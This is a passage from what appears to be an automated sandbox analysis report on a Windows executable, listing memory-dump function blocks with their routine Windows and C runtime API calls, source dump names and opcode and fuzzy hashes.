                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00BD1275,SwapMouseButtons,00000004,?), ref: 00BD12C9
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,80000001,80000001,?,00BD1275,SwapMouseButtons,00000004,?), ref: 00BD12EB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: Control Panel\Mouse
                                                                                                                                                                                                              • API String ID: 3677997916-824357125
                                                                                                                                                                                                              • Opcode ID: 2f42124e944f387a34ec3114134af01ec61602f365a4eeecaa94b356c8270bb9
                                                                                                                                                                                                              • Instruction ID: da5dbecb14f8ddf33d3b672c2700fa23aee707485c5ae63ffeb0d8b36dba527f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f42124e944f387a34ec3114134af01ec61602f365a4eeecaa94b356c8270bb9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD115E71515208BFDB208FA9DC84EAFB7FCEF04750F1049AAF805E7210E2719E4097A4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BE49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00BE27AF,?,00000001), ref: 00BE49F4
                                                                                                                                                                                                              • _free.LIBCMT ref: 00C1FB04
                                                                                                                                                                                                              • _free.LIBCMT ref: 00C1FB4B
                                                                                                                                                                                                                • Part of subcall function 00BE29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BE2ADF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Bad directive syntax error, xrefs: 00C1FB33
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                                                                                              • String ID: Bad directive syntax error
                                                                                                                                                                                                              • API String ID: 2861923089-2118420937
                                                                                                                                                                                                              • Opcode ID: 09111e4d20b36fda84257f3724cebac9778cd2795f1580a7b059e427040ffcc4
                                                                                                                                                                                                              • Instruction ID: 9817d14e138ecae1303d10267b34b1883692fd67c1ab58d8c6b2a89eacab8ea5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09111e4d20b36fda84257f3724cebac9778cd2795f1580a7b059e427040ffcc4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36919E71910259AFCF14EFA5C8919EEB7B4FF06310F10457AF816AB2A1DB309E46EB50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00C2032B
                                                                                                                                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 00C20375
                                                                                                                                                                                                                • Part of subcall function 00BF0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BE2A58,?,00008000), ref: 00BF02A4
                                                                                                                                                                                                                • Part of subcall function 00BF09C5: GetLongPathNameW.KERNEL32 ref: 00BF09E4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                                                                                              • String ID: X
                                                                                                                                                                                                              • API String ID: 3777226403-3081909835
                                                                                                                                                                                                              • Opcode ID: 266c025637a0f177ec3da7b9a3065dc6fce4bfac5abbd21f2f0adb80c962b1ce
                                                                                                                                                                                                              • Instruction ID: ee6460d3bfe6385bb047696d2d5191a2187efa5d8131f909a26ea19bb76b6e14
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 266c025637a0f177ec3da7b9a3065dc6fce4bfac5abbd21f2f0adb80c962b1ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8121C671A102989BDF01EF98C845BEE7BFC9F49304F10409AE504A7241DBB49A88CFA1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d6036a893c1819e0beed61b5fb1b69d7f15bb772108006abf7bc32df9bd27650
                                                                                                                                                                                                              • Instruction ID: de8aa9a73fcbbaaa1dc66720386a4dbd028a7d642a35336abb4827c4d820c39f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6036a893c1819e0beed61b5fb1b69d7f15bb772108006abf7bc32df9bd27650
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64F1D071900199DFCF14DF9AC880AFEB7F9FF49700F5081AAE906AB290DB349A41CB55
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 6b6b3c612856e7dfa3c85faab19d2653ed301bc157dd17590e61cb9bba55e70f
                                                                                                                                                                                                              • Instruction ID: a2aef7d78f48a03506d1e58ca9d244aa020529aea0b304f11af6d6d985420ab5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b6b3c612856e7dfa3c85faab19d2653ed301bc157dd17590e61cb9bba55e70f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DF12A70A083019FC714EF29C484A6ABBE5FF88314F14896EF89A9B351D770E945CF92
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 00BE39C3
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00010000,00C60980,00000000), ref: 00BE39E9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead_memmove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1325644223-0
                                                                                                                                                                                                              • Opcode ID: f19b28a4ea040fdad2b98fa0ceed911df8c3ed2fc06bcdadc988983aaa14c9c7
                                                                                                                                                                                                              • Instruction ID: 2453c1e93db7e599f579111df98ebb029fa0983c4a8caa13ca1f5f617135bf82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f19b28a4ea040fdad2b98fa0ceed911df8c3ed2fc06bcdadc988983aaa14c9c7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E981D034A04259EBDF00DF66D8887ADBBF0FF00700F2485D6E8669B246D775DA60DB50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                                                              • Opcode ID: 6a1b0aa47edcdd3bd235d205bb901c1f5a7d263b604d707ea6f4c0600e226e64
                                                                                                                                                                                                              • Instruction ID: fae03e51a2a3375388b93f78b6d7b6f7294c09f88f5d1367285a1c0d4768231f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a1b0aa47edcdd3bd235d205bb901c1f5a7d263b604d707ea6f4c0600e226e64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B761CEB1600209EBDF048F2AD8806AE7BF4FF44710F6589A9EC19CF295EB35D960DB50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __FF_MSGBANNER.LIBCMT ref: 00BF5953
                                                                                                                                                                                                                • Part of subcall function 00BFA39B: __NMSG_WRITE.LIBCMT ref: 00BFA3C2
                                                                                                                                                                                                                • Part of subcall function 00BFA39B: __NMSG_WRITE.LIBCMT ref: 00BFA3CC
                                                                                                                                                                                                              • __NMSG_WRITE.LIBCMT ref: 00BF595A
                                                                                                                                                                                                                • Part of subcall function 00BFA3F8: GetModuleFileNameW.KERNEL32(00000000,00C953BA,00000104,00000004,00000001,00BF1003), ref: 00BFA48A
                                                                                                                                                                                                                • Part of subcall function 00BFA3F8: ___crtMessageBoxW.LIBCMT ref: 00BFA538
                                                                                                                                                                                                                • Part of subcall function 00BF32CF: ___crtCorExitProcess.LIBCMT ref: 00BF32D5
                                                                                                                                                                                                                • Part of subcall function 00BF32CF: ExitProcess.KERNEL32 ref: 00BF32DE
                                                                                                                                                                                                                • Part of subcall function 00BF8D58: __getptd_noexit.LIBCMT ref: 00BF8D58
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00E90000,00000000,00000001,?,00000004,?,?,00BF1003,?), ref: 00BF597F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1372826849-0
                                                                                                                                                                                                              • Opcode ID: db2c0d0c5648eb65776607dedb00b0c65d78cb164f389b5e193bbf56470a67c5
                                                                                                                                                                                                              • Instruction ID: ca3a24c5b1d9ea308b1837bcf32bb4693254a0174c1b2bc188a33e37b6a7fdef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db2c0d0c5648eb65776607dedb00b0c65d78cb164f389b5e193bbf56470a67c5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F401D235301B0EEAE6292734A842B3E32C8CF52770F5140AAF714AB191DEB09D094761
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: CALL
                                                                                                                                                                                                              • API String ID: 0-4196123274
                                                                                                                                                                                                              • Opcode ID: 0a72d39d00fe54cacf222f17a39592fc676467e83831dc5613e7b96e851d031a
                                                                                                                                                                                                              • Instruction ID: 61a268d9cb0952d2430ce59baa281eaf05dbb91bbf1ebe7284d72e694a4c4d14
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a72d39d00fe54cacf222f17a39592fc676467e83831dc5613e7b96e851d031a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D322774508241DFCB24DF14C494A2AFBE1FF85304F1589AEE88A9B362E735ED45DB82
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                                                              • String ID: EA06
                                                                                                                                                                                                              • API String ID: 4104443479-3962188686
                                                                                                                                                                                                              • Opcode ID: c5594b945856660cb6cfe3f4b64721979563bbfae4ddb88062ee43c92956edf4
                                                                                                                                                                                                              • Instruction ID: 9fd755f58eae6c9fd8f3cfc0d57ed3271a4b82e0ac2186473ceba8b4133f04c0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5594b945856660cb6cfe3f4b64721979563bbfae4ddb88062ee43c92956edf4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46416926A041E89FDF219B6598917BF7BE5CB55310F6840F5E982FB287C7308E8483E1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _strcat.LIBCMT ref: 00C4E20C
                                                                                                                                                                                                                • Part of subcall function 00BD4D37: __itow.LIBCMT ref: 00BD4D62
                                                                                                                                                                                                                • Part of subcall function 00BD4D37: __swprintf.LIBCMT ref: 00BD4DAC
                                                                                                                                                                                                              • _wcscpy.LIBCMT ref: 00C4E29B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __itow__swprintf_strcat_wcscpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1012013722-0
                                                                                                                                                                                                              • Opcode ID: 5bc87cb561459b0ac46db002d68f78fb8a3746650231e42b14378df3ec840167
                                                                                                                                                                                                              • Instruction ID: ac1a8b9889d1bb01110a90259e358868b145a138e12d5046a4bae248c61aa188
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bc87cb561459b0ac46db002d68f78fb8a3746650231e42b14378df3ec840167
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27912B35A00504DFCB29DF18C5819ADB7E5FF59310B55809AF81A9F362EB30EE45CB81
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsThemeActive.UXTHEME ref: 00BE5FEF
                                                                                                                                                                                                                • Part of subcall function 00BF359C: __lock.LIBCMT ref: 00BF35A2
                                                                                                                                                                                                                • Part of subcall function 00BF359C: DecodePointer.KERNEL32(00000001,?,00BE6004,00C28892), ref: 00BF35AE
                                                                                                                                                                                                                • Part of subcall function 00BF359C: EncodePointer.KERNEL32(?,?,00BE6004,00C28892), ref: 00BF35B9
                                                                                                                                                                                                                • Part of subcall function 00BE5F00: SystemParametersInfoW.USER32 ref: 00BE5F18
                                                                                                                                                                                                                • Part of subcall function 00BE5F00: SystemParametersInfoW.USER32 ref: 00BE5F2D
                                                                                                                                                                                                                • Part of subcall function 00BE5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BE526C
                                                                                                                                                                                                                • Part of subcall function 00BE5240: IsDebuggerPresent.KERNEL32 ref: 00BE527E
                                                                                                                                                                                                                • Part of subcall function 00BE5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00BE52E6
                                                                                                                                                                                                                • Part of subcall function 00BE5240: SetCurrentDirectoryW.KERNEL32(?), ref: 00BE5366
                                                                                                                                                                                                              • SystemParametersInfoW.USER32 ref: 00BE602F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1438897964-0
                                                                                                                                                                                                              • Opcode ID: e1bc57b4fbd2dc30460b1876dc0814d0d66abd6ddde9bd4ff3e3e0b6a725bdcd
                                                                                                                                                                                                              • Instruction ID: c408c40a5f20150a965f7b51ffb087bb45ad3455588db97c523ea9474111cf56
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1bc57b4fbd2dc30460b1876dc0814d0d66abd6ddde9bd4ff3e3e0b6a725bdcd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B118C718293419BC710DF69EC49B0EBBE8EF99710F00465BF044872A1DBB0A948CB92
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00BE4327
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00C20717
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                              • Opcode ID: b6f5857a734d3f7f5610fee094323cdc5cd2ddcb052c0d196d08f2f2aed04c74
                                                                                                                                                                                                              • Instruction ID: 8680c1f8a1b9711fbfebe775b4ffb1a8cb76ca60a03edf8e6b9ca77b7dc1d0d8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6f5857a734d3f7f5610fee094323cdc5cd2ddcb052c0d196d08f2f2aed04c74
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17019270244349BEF3300E25CC8AF667ADCEB02768F20C359FAE56A1E0C7B45C458B18
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BDBC07
                                                                                                                                                                                                                • Part of subcall function 00BE1821: _memmove.LIBCMT ref: 00BE185B
                                                                                                                                                                                                              • _wcscat.LIBCMT ref: 00C13593
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FullNamePath_memmove_wcscat
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 257928180-0
                                                                                                                                                                                                              • Opcode ID: e5a2b32d5c94ecd2b91da5c3342885f6fcbd3dc6e09a15b01d16b54f11200a79
                                                                                                                                                                                                              • Instruction ID: 8e275de52cb31ee9e8d50ec387d0b112728170899ea2204fdefb83104cab3e37
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5a2b32d5c94ecd2b91da5c3342885f6fcbd3dc6e09a15b01d16b54f11200a79
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E211A1349142099BCF05EBA49886FDEB7E8FF08350B1045EABD45D73A0EF70AB849B51
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BF593C: __FF_MSGBANNER.LIBCMT ref: 00BF5953
                                                                                                                                                                                                                • Part of subcall function 00BF593C: __NMSG_WRITE.LIBCMT ref: 00BF595A
                                                                                                                                                                                                                • Part of subcall function 00BF593C: RtlAllocateHeap.NTDLL(00E90000,00000000,00000001,?,00000004,?,?,00BF1003,?), ref: 00BF597F
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00BF101C
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00BF1031
                                                                                                                                                                                                                • Part of subcall function 00BF87CB: RaiseException.KERNEL32(?,?,?,00C8CAF8,?,?,?,?,?,00BF1036,?,00C8CAF8,?,00000001), ref: 00BF8820
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3902256705-0
                                                                                                                                                                                                              • Opcode ID: f95306d4932bd618d0f10082576b90b3823eac06fbcc0093131c46b3cb317c6e
                                                                                                                                                                                                              • Instruction ID: 54d13f87686e2bc33bc5ddfd3d69cf917215ea441522a7cd77b55550e4e42534
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f95306d4932bd618d0f10082576b90b3823eac06fbcc0093131c46b3cb317c6e
